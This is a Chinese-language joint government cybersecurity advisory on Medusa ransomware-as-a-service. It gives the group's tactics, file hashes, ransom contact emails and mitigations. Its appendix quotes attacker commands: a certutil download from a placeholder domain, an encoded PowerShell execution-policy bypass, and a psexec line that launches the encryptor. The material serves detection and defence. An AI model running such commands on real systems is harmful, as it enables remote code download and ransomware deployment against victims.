#StopRansomware: Medusa勒索软件
摘要
联邦调查局(FBI)、网络安全和基础设施安全局(CISA)以及多州信息共享与分析中心(MS-ISAC)联合发布此公告,旨在传播已知的Medusa勒索软件战术、技术和程序(TTPs)以及入侵指标(IOCs)。这些信息是通过FBI截至2025年2月的调查发现的。
Medusa是一种勒索软件即服务(RaaS)变种,首次发现于2021年6月。截至2025年2月,Medusa开发者和附属机构已影响了超过300名受害者,涉及多个关键基础设施部门,包括医疗、教育、法律、保险、技术和制造业。
技术细节
背景
Medusa RaaS变种从2021年至今一直被用于进行勒索软件攻击。Medusa最初作为封闭式勒索软件变种运营,所有开发和相关操作均由同一组网络威胁行为者控制。虽然Medusa后来发展为使用附属模式,但重要操作(如赎金谈判)仍由开发者集中控制。
初始访问
Medusa开发者通常在网络犯罪论坛和市场中招募初始访问经纪人(IABs)以获得对潜在受害者的初始访问权限。他们向这些附属机构提供从100美元到100万美元不等的潜在付款,并有机会独家为Medusa工作。
发现
Medusa行为者使用"离地生存"(LOTL)和合法工具Advanced IP Scanner和SoftPerfect Network Scanner进行初始用户、系统和网络枚举。一旦在受害者网络中建立立足点,通常会扫描以下端口:21(FTP)、22(SSH)、23(Telnet)、80(HTTP)、115(SFTP)、443(HTTPS)、1433(SQL数据库)、3050(Firebird数据库)、3128(HTTP Web代理)、3306(MySQL数据库)和3389(RDP)。
防御规避
Medusa行为者使用LOTL来避免检测。Certutil(certutil.exe)用于在执行文件传入时避免检测。行为者被观察到使用几种不同的PowerShell检测规避技术,复杂度不断增加。
横向移动和执行
Medusa行为者使用各种合法的远程访问软件;他们可能根据受害者环境中已有的任何远程访问工具来定制选择,作为规避检测的手段。
数据外泄和加密
Medusa行为者安装并使用Rclone将数据外泄到行为者和附属机构使用的Medusa C2服务器。行为者使用Sysinternals PsExec、PDQ Deploy或BigFix在网络上的文件中部署加密器gaze.exe。
入侵指标
恶意文件
| 文件 | MD5哈希 | 描述 |
|---|---|---|
| !!!READ_ME_MEDUSA!!!.txt | 已编辑 | 赎金记录文件 |
| openrdp.bat | 44370f5c977e415981febf7dbb87a85c | 允许传入RDP和远程WMI连接 |
| pu.exe | 80d852cd199ac923205b61658a9ec5bc | 反向shell |
Medusa电子邮件地址
- key.medusa.serviceteam@protonmail.com
- medusa.support@onionmail.org
- mds.svt.breach@protonmail.com
- mds.svt.mir2@protonmail.com
- MedusaSupport@cock.li
缓解措施
FBI、CISA和MS-ISAC建议组织实施以下缓解措施,以基于威胁行为者的活动改善网络安全状况:
- 实施恢复计划,在物理上独立、分段和安全的位置维护和保留敏感或专有数据和服务器的多个副本
- 要求所有具有密码登录的帐户符合NIST标准
- 尽可能要求对所有服务进行多因素认证
- 保持所有操作系统、软件和固件的最新状态
- 对网络进行分段以防止勒索软件传播
- 使用网络监控工具识别、检测和调查异常活动
- 要求通过VPN或跳板机进行远程访问
- 监控未经授权的扫描和访问尝试
- 过滤网络流量,防止未知或不受信任的来源访问内部系统上的远程服务
附录A:Medusa命令
这些命令明确展示了Medusa威胁行为者在受害者网络内获得立足点后使用的方法。事件响应者和威胁猎人可以使用此信息检测恶意活动。系统管理员可以使用此信息设计允许列表/拒绝列表策略或其他保护机制。
示例命令包括:
cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dllpowershell -exec bypass -enc <base64 encrypted command string>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe"